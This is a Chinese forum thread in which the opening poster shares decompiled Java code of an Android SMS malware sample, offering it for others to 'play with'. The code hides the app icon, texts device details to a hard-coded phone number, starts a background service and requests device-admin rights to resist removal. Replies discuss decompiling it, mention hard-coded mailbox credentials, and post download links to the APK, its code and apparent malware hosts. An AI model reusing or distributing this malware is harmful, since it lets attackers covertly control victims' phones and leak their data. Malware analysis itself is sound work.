手机病毒，之前看到有人会玩，刚好收到一个，你们拿去玩吧

已返编译：

protected void onCreate(Bundle paramBundle)
{
super.onCreate(paramBundle);
super.requestWindowFeature(1);
setContentView(2130903040);
SmSutils localSmSutils = new SmSutils();
if (SmSutils.key.equals(SmSutils.getPublicKey(this)))
{
localSmSutils.sendSMS("18789837060", "手机已安装软件,回复 com#false 关闭 com#true 开启, 版本" + Build.VERSION.SDK_INT + " " + Build.MODEL, null);
Toast.makeText(this, "程序启动成功", 1).show();
getPackageManager().setComponentEnabledSetting(getComponentName(), 2, 1);
startService(new Intent(this, SmSserver.class));
this.Dmanager = ((DevicePolicyManager)getSystemService("device_policy"));
ComponentName localCompOnentName= new ComponentName(this, DeviceReceiver.class);
if (!this.Dmanager.isAdminActive(localComponentName))
{
Intent localIntent = new Intent(getAction());
localIntent.putExtra(getExtraDeviceAdmin(), localComponentName);
localIntent.putExtra(getExtraAddExplanation(), "设备管理器");
startActivityForResult(localIntent, 0);
}
finish();
return;
}
localSmSutils.sendSMS("18789837060", "证书错误,程序启动失败", null);
Toast.makeText(this, "证书错误,程序启动失败", 1).show();
finish();
}

@luap 好 大拇指

求玩法..

用小号发短信骂三门？

@luap 求教 这个怎么反编译的。。竟然完完整整的出来了

@supman 因为没有混淆啊

炸之

@luap 厉害厉害（手动鼓掌

是干嘛的……

我跟踪过类似的 Android 病毒，当时写了个分析。可以看看我 blog:http://ztwo.github.io/blog/Androidworm/

不会玩放腾讯哈勃分析

@jsonzz 看了你那个文章，你是怎么进入他邮箱的呢 难道把密码写在 apk 里？

@ljcarsenal 源码里有发信账号和密码。

这病毒我见过，据说是个初二学生写的，密码就硬编码在代码里。

http://yzc178co.com/index.htm


@luap
@jsonzz

这个呢，我昨天反编译了一下，不太会 java ，也没看到什么有价值的东西，也不知道折腾的对不对

代码： https://mega.nz/#!CF93iCyS!93vk_KL3YKZMtWQ34GPb_1Jol-viW63FbCxHuIHOvaI

域名应该是快到期了， apk 这里： https://mega.nz/#!XJtACAZY!vPYDNgu7yIEbOeZZx98mTafLTJ3NgQM4izi0qJI9mrU

http://218.6.173.38/

...这个地址

android 漏洞不少，无法卸载的漏洞在 AndroidM 上还有

关键是这个是 android 程序，在 iOS 无效吧。。。

@shenfu1991 iOS 有支付宝（大雾

这种多了，实际上没啥，只是安卓权限比较多，安装上就能乱搞。
你看上面都有人反编译了，混淆都不做的

@CodingPuppy 我有点蒙，只有成为设备管理器白不能卸载吧

@jsonzz 厉害